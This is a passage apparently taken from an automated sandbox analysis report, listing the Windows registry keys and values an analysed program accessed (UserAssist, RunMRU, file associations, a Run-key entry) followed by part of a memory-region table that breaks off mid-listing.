HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbaubfg.rkr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
|
a
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
|
MRUList
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000003034C
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040354
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\osk.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020184
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203B4
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020412
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000030412
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000203BE
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Input
|
IsInputAppPreloadEnabled
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000B034E
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000C034E
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
|
Excel.CSV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
|
Word.Document.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
|
Word.DocumentMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
|
Word.Document.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
|
Word.Template.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
|
Word.TemplateMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
|
Word.Template.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msg\OpenWithProgids
|
Outlook.File.msg.15
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odp\OpenWithProgids
|
PowerPoint.OpenDocumentPresentation.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ods\OpenWithProgids
|
Excel.OpenDocumentSpreadsheet.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.odt\OpenWithProgids
|
Word.OpenDocumentText.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pot\OpenWithProgids
|
PowerPoint.Template.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potm\OpenWithProgids
|
PowerPoint.TemplateMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.potx\OpenWithProgids
|
PowerPoint.Template.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppam\OpenWithProgids
|
PowerPoint.Addin.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsm\OpenWithProgids
|
PowerPoint.SlideShowMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppsx\OpenWithProgids
|
PowerPoint.SlideShow.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ppt\OpenWithProgids
|
PowerPoint.Show.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptm\OpenWithProgids
|
PowerPoint.ShowMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pptx\OpenWithProgids
|
PowerPoint.Show.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rtf\OpenWithProgids
|
Word.RTF.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldm\OpenWithProgids
|
PowerPoint.SlideMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sldx\OpenWithProgids
|
PowerPoint.Slide.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vsto\OpenWithProgids
|
bootstrap.vsto.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlam\OpenWithProgids
|
Excel.AddInMacroEnabled
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xls\OpenWithProgids
|
Excel.Sheet.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsb\OpenWithProgids
|
Excel.SheetBinaryMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsm\OpenWithProgids
|
Excel.SheetMacroEnabled.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
|
Excel.Sheet.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlt\OpenWithProgids
|
Excel.Template.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltm\OpenWithProgids
|
Excel.TemplateMacroEnabled
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xltx\OpenWithProgids
|
Excel.Template
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
|
BackupReminderToastCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DiskSpaceChecking
|
LastInstallTimeLowStorageNotify
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\BackupReminder
|
LastTimeBackupReminderNotify
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Frnepu_pj5a1u2gklrjl!PbegnanHV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Puebzr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
|
MRUListEx
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbaubfg.rkr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}
|
FFlags
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}
|
FFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\osk.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbaubfg.rkr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
|
{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\cmd.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Puebzr
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102
|
CheckSetting
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
|
WMP11.AssocFile.3G2
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
|
WMP11.AssocFile.3GP
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
|
WMP11.AssocFile.3G2
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
|
WMP11.AssocFile.ADTS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
|
WMP11.AssocFile.AIFF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithProgids
|
WMP11.AssocFile.AIFF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
|
WMP11.AssocFile.ASF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
|
WMP11.AssocFile.ASX
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
|
WMP11.AssocFile.AU
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
|
AutoIt3Script
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
|
WMP11.AssocFile.AVI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
|
Paint.Picture
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
|
CABFolder
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
|
Microsoft.PowerShellCmdletDefinitionXML.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
|
CSSfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
|
ddsfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
|
Paint.Picture
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
|
dllfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
|
emffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
|
exefile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
|
WMP11.AssocFile.FLAC
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
|
fonfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
|
giffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
|
htmlfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
|
icofile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.inf\OpenWithProgids
|
inffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
|
inifile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
|
pjpegfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
|
jpegfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpeg\OpenWithProgids
|
jpegfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithProgids
|
jpegfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
|
wdpfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
|
lnkfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
|
WMP11.AssocFile.M2TS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
|
WMP11.AssocFile.m3u
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
|
WMP11.AssocFile.M4A
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
|
WMP11.AssocFile.MP4
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
|
mhtmlfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithProgids
|
mhtmlfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
|
WMP11.AssocFile.MIDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mk3d\OpenWithProgids
|
WMP11.AssocFile.MK3D
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
|
WMP11.AssocFile.MKA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
|
WMP11.AssocFile.MKV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mod\OpenWithProgids
|
WMP11.AssocFile.MPEG
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
|
WMP11.AssocFile.MOV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
|
WMP11.AssocFile.MP3
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
|
WMP11.AssocFile.MP4
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids
|
WMP11.AssocFile.M2TS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ocx\OpenWithProgids
|
ocxfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.otf\OpenWithProgids
|
otffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
|
pngfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1\OpenWithProgids
|
Microsoft.PowerShellScript.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ps1xml\OpenWithProgids
|
Microsoft.PowerShellXMLData.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psd1\OpenWithProgids
|
Microsoft.PowerShellData.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.psm1\OpenWithProgids
|
Microsoft.PowerShellModule.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pssc\OpenWithProgids
|
Microsoft.PowerShellSessionConfiguration.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rle\OpenWithProgids
|
rlefile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scf\OpenWithProgids
|
SHCmdFile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.search-ms\OpenWithProgids
|
SearchFolder
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithProgids
|
shtmlfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithProgids
|
WMP11.AssocFile.AU
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sys\OpenWithProgids
|
sysfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tif\OpenWithProgids
|
TIFImage.Document
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithProgids
|
TIFImage.Document
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.TS\OpenWithProgids
|
WMP11.AssocFile.TTS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttc\OpenWithProgids
|
ttcfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ttf\OpenWithProgids
|
ttffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
|
txtfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithProgids
|
WMP11.AssocFile.WAV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wax\OpenWithProgids
|
WMP11.AssocFile.WAX
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wdp\OpenWithProgids
|
wdpfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wm\OpenWithProgids
|
WMP11.AssocFile.ASF
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWithProgids
|
WMP11.AssocFile.WMA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmf\OpenWithProgids
|
wmffile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithProgids
|
WMP11.AssocFile.WMV
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmx\OpenWithProgids
|
WMP11.AssocFile.ASX
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WPL\OpenWithProgids
|
WMP11.AssocFile.WPL
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithProgids
|
WMP11.AssocFile.WVX
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xml\OpenWithProgids
|
xmlfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xsl\OpenWithProgids
|
xslfile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
|
CompressedFolder
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
PP1
|
There are 224 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6D69000
|
unkown
|
page read and write
|
||
|
A1A2000
|
heap
|
page read and write
|
||
|
BAA7000
|
unkown
|
page read and write
|
||
|
10374000
|
heap
|
page read and write
|
||
|
10362000
|
heap
|
page read and write
|
||
|
BFFE000
|
heap
|
page read and write
|
||
|
C0AC7FF000
|
stack
|
page read and write
|
||
|
7FF58503C000
|
unkown
|
page readonly
|
||
|
7FF585450000
|
unkown
|
page readonly
|
||
|
2428A5B9000
|
heap
|
page read and write
|
||
|
835D000
|
unkown
|
page read and write
|
||
|
A1D4000
|
heap
|
page read and write
|
||
|
84C9000
|
unkown
|
page read and write
|
||
|
BFE4000
|
heap
|
page read and write
|
||
|
6CA9000
|
heap
|
page read and write
|
||
|
2428A5AE000
|
heap
|
page read and write
|
||
|
742402092000
|
unkown
|
page read and write
|
||
|
10918000
|
heap
|
page read and write
|
||
|
C49000
|
heap
|
page read and write
|
||
|
83A3000
|
unkown
|
page read and write
|
||
|
2428A584000
|
heap
|
page read and write
|
||
|
BF5000
|
heap
|
page read and write
|
||
|
2008282D000
|
heap
|
page read and write
|
||
|
2ED5D181000
|
heap
|
page read and write
|
||
|
A75B000
|
stack
|
page read and write
|
||
|
7FF5A4F53000
|
unkown
|
page readonly
|
||
|
84F1000
|
heap
|
page read and write
|
||
|
7FF585498000
|
unkown
|
page readonly
|
||
|
7FF5A4EC2000
|
unkown
|
page readonly
|
||
|
BF28000
|
unkown
|
page read and write
|
||
|
C077000
|
heap
|
page read and write
|
||
|
6C95000
|
unkown
|
page read and write
|
||
|
8525000
|
heap
|
page read and write
|
||
|
8519000
|
heap
|
page read and write
|
||
|
7FF5A4C6E000
|
unkown
|
page readonly
|
||
|
7475000
|
unkown
|
page read and write
|
||
|
74240049B000
